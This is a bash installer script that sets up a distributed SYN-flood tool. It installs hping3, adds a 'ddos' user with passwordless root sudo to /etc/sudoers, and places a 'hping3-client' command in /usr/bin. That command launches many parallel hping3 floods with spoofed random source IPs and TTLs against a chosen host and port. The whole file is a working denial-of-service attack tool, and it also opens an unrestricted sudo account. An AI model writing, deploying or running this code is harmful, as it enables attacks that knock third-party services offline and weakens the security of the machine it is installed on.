#!/bin/bash
if [ $UID != 0 ]
then
	echo -e "You need to be root.\n"
	exit
fi

apt-get install -y hping3
useradd -M ddos
echo -e "ddos\tALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

# hping3-client
cat > hping3-client << EOF_CLIENT
#!/bin/bash
host=\$1
dport=\$2
atime=\$3
ttl_pool=\$4
thread=\$5
ip_pool=\$6

is_valid_ipv4 () {
    local address=\${1}
    local result=1
    if [[ "\$address" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
        oldIFS="\$IFS"
        IFS='.'
        ip=(\$address)
        IFS="\$oldIFS"
        [[ \${ip[0]} -le 255 && \${ip[1]} -le 255 \\
            && \${ip[2]} -le 255 && \${ip[3]} -le 255 ]]
        result=\$?
    fi
    echo \$result
}

gen_ip () {
local try_times=1
while true
do
local address=\$1
oldIFS="\$IFS"
IFS='.'
ips=(\$address)
ip=\$(printf "%s.%s.%s.%s" "\$(shuf -i \${ips[0]} -n 1)" "\$(shuf -i \${ips[1]} -n 1)" "\$(shuf -i \${ips[2]} -n 1)" "\$(shuf -i \${ips[3]} -n 1)")
IFS="\$oldIFS"

if [[ \$(is_valid_ipv4 \$ip) == 0 ]]
then
    let try_times=(\$try_times)+1
    return
fi
done
}

let sum=(\$thread)
#echo \$sum

for i in \$(seq 1 1 \$sum)
do
        ttl=\$(shuf -i \$ttl_pool -n 1)
	gen_ip \$ip_pool
	#echo "hping3 -S -L 0 -a \$ip -p \$dport \$host -t \$ttl --flood"
	su ddos -c "sudo hping3 -S -L 0 -a \$ip -p \$dport \$host -t \$ttl --flood 1>/dev/null 2>/dev/null " &
done

for i in \$(seq 1 1 \$atime)
do
	echo "\$i.."
	sleep 1
done
echo "done"

this_info=\$(pkill -15 hping3)

echo -e "===================\n\$this_info"

exit
EOF_CLIENT

chmod +x hping3-client
cp hping3-client /usr/bin/
rm hping3-client
